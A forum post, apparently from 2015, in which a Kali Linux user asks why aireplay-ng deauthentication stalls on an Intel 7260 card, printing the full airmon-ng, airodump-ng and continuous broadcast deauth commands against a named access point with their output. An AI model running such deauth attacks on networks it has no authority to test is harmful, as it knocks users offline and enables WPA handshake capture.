Thread: Deauthentication problem with aieplay-ng

Threaded View

Previous Post Previous Post   Next Post Next Post

Deauthentication problem with aireplay-ng

I've already read multiple threads about this, but nobody seems to have the solution. I have an Acer V5-573G laptop with an Intel Dual Band Wireless-N 7260 WiFi card with iwlwifi-7260-10 driver installed (Kali Linux 2.0). I can successfully use airodump-ng: set the channel and bssid it should listen to, it can find the access point and the beacons count is rising. But when in a new terminal I try to use aireplay-ng it slows after 3 deauth attempts to about 1 deauth in a few seconds, and meanwhile the beacons count in airodump also stops, and even if I restart airodump no more traffic can be captured. It seems like the problem is with the channel, because if I change the channel in airorodump and change it back it works again (however if I change e.g. the bssid instead, nothing happens and airodump can't monitor the traffic).

The process:
    Code:
    root@AndrewLaptop:/home/andrewg# airmon-ng
    PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation Wireless 7260 (rev 73)

root@AndrewLaptop:/home/andrewg# airmon-ng check kill
    Killing these processes:

PID Name
      779 wpa_supplicant
      887 dhclient

root@AndrewLaptop:/home/andrewg# airmon-ng start wlan0
    No interfering processes found
    PHY	Interface	Driver		Chipset

phy0	wlan0		iwlwifi		Intel Corporation Wireless 7260 (rev 73)
    		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
    		(mac80211 station mode vif disabled for [phy0]wlan0)
    Then:
    Code:
    airodump-ng -c 3 --bssid 10:7B:EF:59:EB:70 wlan0mon
    I get this:
    Code:
    CH  3 ][ Elapsed: 6 s ][ 2015-09-13 20:40                                         

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

10:7B:EF:59:EB:70  -20 100      106       11    4   3  54e  WPA2 CCMP   PSK  GeiszlNet                 

BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              

10:7B:EF:59:EB:70  24:A0:74:3D:F6:57  -61    0e-24      0        5                                      
     10:7B:EF:59:EB:70  D4:F4:6F:86:BF:15  -36    0e-24      1       14
    An meanwhile in another terminal:
    Code:
    root@AndrewLaptop:/home/andrewg# aireplay-ng -0 0 -a 10:7B:EF:59:EB:70 wlan0mon
    20:43:03  Waiting for beacon frame (BSSID: 10:7B:EF:59:EB:70) on channel 3
    NB: this attack is more effective when targeting
    a connected wireless client (-c <client's mac>).
    20:43:03  Sending DeAuth to broadcast -- BSSID: [10:7B:EF:59:EB:70]
    20:43:04  Sending DeAuth to broadcast -- BSSID: [10:7B:EF:59:EB:70]
    20:43:04  Sending DeAuth to broadcast -- BSSID: [10:7B:EF:59:EB:70]
    First 3 deauth request comes in under a second, then it slows down and meanwhile the beacon count in the airodump window stops, and I cant start a new airodump except if I change the channel and back again. If I start airodump again with another channel and then start with the same it can collect traffic again.
    Last edited by geiszla; 2015-09-14 at 07:00. Reason: typo in title